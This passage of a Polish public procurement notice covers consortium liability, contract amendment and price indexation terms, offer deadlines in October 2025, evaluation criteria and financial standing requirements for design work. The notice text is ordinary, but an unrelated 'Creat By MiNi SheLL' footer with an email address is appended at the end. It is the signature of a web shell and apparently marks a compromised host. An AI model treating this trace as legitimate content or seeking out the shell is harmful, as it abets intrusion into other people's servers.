ubiegających się o udzielenie zamówienia.<br/>2. Zgodnie z art. 445 ust.1 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu niespełniania warunków, o których mowa w pkt. 10.1a SWZ.<br/>4. Jeśli wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia to:<br/>a) warunek określony w pkt 10.1.4) lit. a. SWZ musi spełniać przynajmniej jeden z Wykonawców (Partnerów) składających<br/>ofertę wspólną na cz. A, B i/lub C<br/>b) pozostałe warunki określone powyżej musi spełniać co najmniej jeden z Partnerów składających ofertę wspólną lub<br/>Partnerzy składający ofertę wspólną na cz. A, B i/lub C spełniają łącznie.<br/>c) dotyczy „zielonego kryterium” tj. posiadania certyfikatu wg normy ISO 14001 lub EMAS lub równoważnego dokumentu -<br/>w przypadku, gdy ofertę składa konsorcjum (wykonawcy wspólnie ubiegający się o zamówienie), wystarczające jest<br/>posiadanie w/w certyfikatu/ów przez jednego z członków konsorcjum.<br/>5. W wypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonają roboty budowlane lub usługi, do których realizacji te zdolności są wymagane. W takim<br/>wypadku należy złożyć Zamawiającemu oświadczenie do oferty, z którego wynika które roboty budowlane lub usługi<br/>wykonają poszczególni Wykonawcy składający ofertę wspólnie.<br/>6. W przypadku wykonawców wspólnie realizujących zamówienie (w tym konsorcjum) Zamawiający dokonywać będzie<br/>bezpośrednich rozliczeń tylko z liderem konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a) Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy odnośnie<br/>wydłużenia terminu realizacji z pkt. 5.1 SWZ:<br/>1. Z uwagi na masowe występowanie choroby zakaźnej ludzi mające bezpośredni lub pośredni wpływ na terminową<br/>realizację niniejszego zadania.<br/>2. Z powodu działania siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego<br/>nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego<br/>powstaniem szkody w znacznych rozmiarach.<br/>3. W przypadku przedłużającej się procedury administracyjnej uzyskania pozwolenia na budowę (okres powyżej 65 dni<br/>ustawowych od dnia złożenia wniosku przez Wykonawcę). Termin wykonania przedmiotu zamówienia ulegnie wtedy<br/>przedłużeniu max. o okres przekraczający ustawowy termin wydania pozwolenia na budowę.<br/>4. Z przyczyn niezależnych od Zamawiającego i Wykonawcy (zdarzenia/osoby trzecie), mających wpływ na terminowe<br/>wykonanie przedmiotu zamówienia.<br/>5. Z przyczyn zależnych od Zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy.<br/>b) Zamawiający dopuszcza zmiany postanowień zawartej umowy na cz. A, B bez przeprowadzenia nowego<br/>postępowania o udzielenie zamówienia, o ile zachodzą okoliczności wymienione w art. 455 ust.1 i 2 ustawy Pzp.<br/>c) Zamawiający informuje, że wynagrodzenie Wykonawcy ulegnie zmianie w przypadku zmiany mającej wpływ na koszty<br/>wykonania zamówienia przez Wykonawcę:<br/>- stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>- wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie<br/>ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>- zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na<br/>ubezpieczenia społeczne lub zdrowotne,<br/>- zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4<br/>października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2024 r. poz. 427),<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.<br/>d) Zamawiający dopuszcza waloryzację cen zawartych w ofercie Wykonawcy w trakcie realizacji umowy, zgodnie z<br/>warunkami określonymi we wzorze umowy:<br/>Niezależnie od zmian, o których mowa powyżej w pkt 13.5 wprowadza się zasady dokonywania zmian wysokości<br/>wynagrodzenia należnego Wykonawcy, zgodnie z art. 439 ustawy Pzp:<br/>1) zmiana wynagrodzenia zostanie określona w oparciu o miesięczny wskaźnik zmiany cen towarów i usług<br/>konsumpcyjnych, ogłaszany w komunikacie Prezesa Głównego Urzędu Statystycznego;<br/>2) wzrost wartości publikowanego wskaźnika przekraczająca 3,0% w stosunku do wartości wskaźnika z miesiąca złożenia<br/>oferty uprawnia Strony umowy do żądania zmiany wynagrodzenia, przy czym początkowy termin ustalenia zmiany wynagrodzenia przypada po upływie 6 m-cy od daty zawarcia Umowy;<br/>3) zmiana wysokości wynagrodzenia dotyczy tylko tej części wynagrodzenia, która przysługuje Wykonawcy za wykonanie tej<br/>części Przedmiotu umowy, której odbiór przypadł po upływie 6 m-cy od daty zawarcia Umowy;<br/>4) maksymalną wartość zmiany wynagrodzenia, jaką dopuszcza zamawiający w efekcie zastosowania postanowień o<br/>zasadach wprowadzania zmian wysokości wynagrodzenia wynosi 5%.<br/>e) Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z pkt 13.6 zobowiązany jest (jeżeli zachodzą przesłanki z<br/>art. 439 ust. 5 Pzp) do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie<br/>odpowiadającym zmianom cen towarów i usług konsumpcyjnych, dotyczących zobowiązania podwykonawcy.<br/>f) Zmiana cen na skutek waloryzacji wymaga formy pisemnej pod rygorem nieważności.<br/>g) Wszelkie zmiany do umowy na cz. A, B wprowadzone zostaną na podstawie aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-29 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-29 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-27</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Cena – waga kryterium – 60 %,<br/>Doświadczenie osób wyznaczonych do realizacji zamówienia – waga kryterium - 35 % ,<br/>,,Zielone kryterium” tj. posiadanie certyfikatu wg normy ISO 14001 lub EMAS - 5% <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. CIĄG DALSZY pkt. 5.7.) &#34;Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w<br/>postępowaniu&#34;<br/>* (przy składaniu oferty na część A i/lub B):<br/>c) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w kwocie min. 10.000,00 zł wystawionej nie wcześniej niż 3 miesiąceprzed jej złożeniem,<br/>W przypadku, gdy Wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których<br/>mowa w art. 112 ust. 2 pkt 3 ustawy Pzp, na zasoby innych podmiotów należy złożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu w kwocie min. 10.000,00 zł, wystawioną nie wcześniej niż 3 miesiące przed jej złożeniem. Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego dokumentów, o których mowa<br/>powyżej w pkt c), wykonawca składa inne dokumenty, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu, dotyczącego sytuacji ekonomicznej lub finansowej.<br/>2. Zamawiający wyklucza z postępowania o udzielenie zamówienia Wykonawcę, w stosunku do którego zaistnieją przesłanki<br/>wymienione w art. 108 ust. 1 ustawy Pzp (z zastrzeżeniem art. 110 ust. 2 ustawy Pzp)<br/>oraz określonych w art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507).<br/>3. Wymagany termin realizacji przedmiotu zamówienia (dla części A - B) : 18 miesięcy od daty zawarcia umowy w tym:<br/>- przedstawienie wstępnej koncepcji projektu do akceptacji Zamawiającego w terminie do 60 dni kalendarzowych od daty<br/>podpisania umowy<br/>- uzyskanie pozwolenia na budowę/decyzji na realizację inwestycji drogowej i przekazanie jej Zamawiającemu lub zgłoszenia robót budowlanych w terminach określonych powyżej dla każdej z części A, B.

Creat By MiNi SheLL
Email: jattceo@gmail.com